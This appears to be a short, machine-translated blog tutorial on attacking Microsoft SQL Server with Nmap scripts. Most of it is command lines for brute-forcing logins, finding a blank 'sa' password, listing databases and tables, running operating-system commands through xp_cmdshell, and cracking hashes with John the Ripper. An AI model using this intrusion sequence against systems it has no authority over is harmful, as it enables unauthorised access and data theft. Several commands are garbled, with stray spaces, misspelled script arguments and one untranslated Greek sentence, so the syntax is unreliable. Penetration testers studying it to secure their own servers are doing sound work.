The Nmap Scripting Engine allows us to use Nmap in addition scanner port and as a complete platform penetrationse testing.
In this post we will deal with some techniques that we can apply in a network to check on Us.
Generally SQL databases play by default on 1433.
By opening nmap we can give the following command:
Nmap - p1433 –script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server), the combination of nmap & Nmap Script Engine gives us information immediately about the version of SQL, as well as the instance name.
In nmap script engine υπάρχει το ms-sql-brute που θα κάνει check για τα Password.
The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we do not find anything we can use some custom password list, the command will be if we consider that the file with the passwords is pass.txt .
nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt
At the same time, the nmap script engine enables us to find null passwords in infrastructures with Microsoft SQL server.
The order would be as follows
Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:
Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx
Then we will find the tables from the databases with the following command.
Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute operating system commands through Nmap scripts such as.
Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx
At Continuity
Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx
We should also say that we can use nmap & nmap script engine with other tools like john the ripper. With john the ripper we can extract the database password hashes to proceed with password cracking.
We thank her warmly SecTeam @johnzontos.